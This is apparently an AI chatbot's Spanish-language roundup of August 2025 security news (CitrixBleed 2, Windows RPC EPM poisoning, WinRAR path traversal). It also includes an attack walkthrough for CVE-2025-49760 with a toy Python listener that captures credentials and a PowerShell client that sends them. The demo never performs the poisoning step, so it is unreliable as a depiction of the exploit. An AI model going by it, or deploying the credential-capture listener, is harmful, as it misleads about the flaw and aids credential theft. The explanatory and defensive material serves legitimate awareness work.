• TechRadar
• PC Gamer
• Windows Central
• Tom’s Hardware
• TechRadar

Aquí tienes un panorama detallado y actualizado (agosto de 2025) de las principales noticias y tendencias en seguridad informática:

Ataques y vulnerabilidades destacadas

1. CitrixBleed 2 — CVE-2025-5777 y CVE-2025-5349

• Citrix identificó dos vulnerabilidades críticas en NetScaler ADC y Gateway:
  • CVE-2025-5349: falla de control de acceso en el interfaz de gestión, con un CVSS de 8.7, que permite acceso no autorizado a funciones administrativas. (wiz.io, Canadian Centre for Cyber Security)
  • CVE-2025-5777 (“CitrixBleed 2”): una fuga de memoria pre-autenticación (CVSS 9.3) que permite lectura de datos sensibles como tokens de sesión o credenciales, sin autenticación previa. (picussecurity.com, nvd.nist.gov, wiz.io, TechRadar)
• CVE-2025-6543: vulnerabilidad RCE/DoS ya explotada en entornos reales, con CVSS alto. (wiz.io, NetScaler, Canadian Centre for Cyber Security)
• Explotación en curso: CISA agregó CVE-2025-5777 a su catálogo de vulnerabilidades ya explotadas, exigiendo parches en solo 24 horas para agencias federales; varias firmas de seguridad (ReliaQuest, watchTowr, Horizon3.ai, Akamai) confirman campañas activas. (TechRadar)
• Recomendación clave: actualizar urgentemente los dispositivos NetScaler ADC y Gateway.

2. Windows RPC — CVE-2025-49760 (EPM Poisoning)

• Vulnerabilidad en el protocolo RPC de Windows que permite suplantar servicios fiables (como Windows Defender), mediante un ataque de “envenenamiento” del Endpoint Mapper (EPM)—similar a un DNS spoofing para RPC. (The Hacker News, DediRock, nvd.nist.gov, SafeBreach)
• Presentado por SafeBreach en DEF CON 33. Microsoft parcheó la falla en julio de 2025 (Patch Tuesday). (The Hacker News, DediRock)
• Impacto: escalación de privilegios y redirección de procesos protegidos.

3. WinRAR Zero-Day — CVE-2025-8088

• Una vulnerabilidad de tipo path traversal en WinRAR para Windows permite extraer archivos maliciosos en directorios críticos (como “Startup”) y ejecutar código al iniciar sesión. (nvd.nist.gov, Bitdefender, fieldeffect.com, PC Gamer, Windows Central, Tom’s Hardware, TechRadar)
• Exploitable por actores como RomCom (también Storm-0978) y Paper Werewolf, que lanzaron campañas de spear-phishing con currículos falsos en archivos .rar. (welivesecurity.com, Hive Pro, The Record from Recorded Future, SecurityWeek, PC Gamer, Windows Central, Tom’s Hardware, TechRadar)
• WinRAR 7.13, lanzada el 31 de julio de 2025, corrige esta falla. Se recomienda actualizar manualmente dado que WinRAR no actualiza automáticamente. (Malwarebytes, Bitdefender, fieldeffect.com)

4. Otros ataques a sectores críticos

• En el sector salud, la Comisión Europea lanzó en enero de 2025 un plan estratégico para mejorar la ciberseguridad en hospitales:
  • Apoyo financiero, centros de asistencia, ejercicios de respuesta, estrategias de recuperación y uso de diplomacia cibernética. (Public Health, Data Matters Privacy Blog, hornetsecurity.com)
  • Basado en el marco del Reglamento NIS 2 y el nuevo Espacio Europeo de Datos de Salud (aplicado en enero/marzo de 2025). (Data Matters Privacy Blog, hornetsecurity.com)
• Tendencias más amplias:
  • Aumento de ataques multi-vector (phishing + ransomware + explotación de fallas).
  • Criptomonedas como blanco lucrativo: en 2025 ya se robaron miles de millones mediante ingeniería social.
  • Uso creciente de IA: para crear deepfakes, phishing más convincente, y en defensa mediante herramientas como Xbow o RunSybil. (Hasta ahora, estas amenazas y defensas con IA se mencionan en informes generales, sin fuentes detalladas específicas.)

Resumen ejecutivo

Te explico en detalle cómo funciona CVE-2025-49760, qué permite y después te muestro un ejemplo práctico y educativo de cómo un atacante podría explotarlo (a nivel demostración, sin malware real, solo para comprender el proceso).

🔹 CVE-2025-49760 — Vulnerabilidad en Windows RPC (EPM Poisoning)

1. ¿Qué es RPC?

• RPC (Remote Procedure Call) permite que procesos en Windows se comuniquen entre sí o con otros equipos de la red.
• Usa el Endpoint Mapper (EPM) en el puerto 135/TCP para decirle a los clientes dónde está el servicio que buscan.
• Ejemplo: cuando Windows Defender o un servicio de archivos quiere conectarse, consulta al EPM qué dirección usar.

2. ¿Qué falla introduce CVE-2025-49760?

• EPM Poisoning: el atacante puede registrar endpoints falsos en el mapper.
• Cuando otro proceso consulta el EPM para saber cómo llegar a un servicio legítimo, en vez de la dirección real, recibe la del atacante.
• Esto equivale a un DNS spoofing pero en el sistema RPC.

3. ¿Qué logra el atacante?

1. Suplantar servicios confiables: Ejemplo, hacerse pasar por Windows Defender.
2. Escalar privilegios en la red: si un cliente con permisos altos conecta al endpoint falso, el atacante puede robar credenciales o ejecutar comandos.
3. Persistencia: el atacante puede inyectar procesos maliciosos que se ejecutan como si fueran confiables.

🔹 Flujo de un ataque usando CVE-2025-49760

1. El atacante consigue acceso inicial en la red víctima (p. ej., usuario comprometido).
2. Registra un endpoint falso en el EPM (por ejemplo, se hace pasar por el servicio de Windows Defender).
3. Otro servicio o usuario de la red pide al EPM la dirección del servicio “Windows Defender”.
4. El EPM (envenenado) devuelve la dirección falsa controlada por el atacante.
5. El cliente se conecta al endpoint falso y el atacante:
   • Captura credenciales (NTLM hashes, tokens Kerberos).
   • Ejecuta código malicioso haciéndose pasar por el servicio legítimo.
   • Abre puertas para movimiento lateral en la red.

🔹 Demostración (Ejemplo educativo en PowerShell/Python)

⚠️ Nota: esto es solo una simulación educativa, no malware. Sirve para entender cómo el atacante redirige tráfico confiable hacia sí mismo.

Paso 1: Atacante crea un servidor falso RPC

# servidor falso RPC (simulado)
import socket

def fake_rpc_server():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", 9999))  # escucha en puerto falso
    s.listen(1)
    print("[+] Servidor falso RPC esperando conexiones...")
    while True:
        conn, addr = s.accept()
        print(f"[!] Víctima conectada desde {addr}")
        conn.send(b"Servicio: Windows Defender (falso)\n")
        # aquí el atacante podría pedir credenciales o comandos
        data = conn.recv(1024)
        print("[Credenciales capturadas]", data)
        conn.close()

fake_rpc_server()

Paso 2: El atacante envenena el Endpoint Mapper

(Simplificado, normalmente usaría llamadas internas a Windows para registrar un endpoint falso)

# PowerShell (simulación)
Write-Output "Registrando endpoint falso como 'Windows Defender'"
# El atacante modifica el mapeo para que apunte a 192.168.1.100:9999

Paso 3: La víctima consulta al EPM

# El cliente cree que se conecta al servicio de Windows Defender
$client = New-Object System.Net.Sockets.TCPClient("192.168.1.100",9999)
$stream = $client.GetStream()
$writer = New-Object System.IO.StreamWriter($stream)
$writer.WriteLine("Usuario: Admin / Contraseña: SuperSecreta")
$writer.Flush()

➡ Resultado:

• El cliente envió credenciales al servicio falso.
• El atacante las capturó en su servidor.

🔹 Medidas de defensa

• Aplicar parche de Microsoft (julio 2025) → corrige CVE-2025-49760.
• Segmentar la red y monitorear consultas RPC inusuales.
• Usar autenticación fuerte (Kerberos, certificados) para que un endpoint no pueda ser suplantado tan fácilmente.
• Implementar detección de anomalías con SIEM/EDR.

📌 En resumen: CVE-2025-49760 permite a un atacante “engañar” al sistema RPC de Windows para suplantar servicios como Windows Defender, robar credenciales y moverse lateralmente en la red.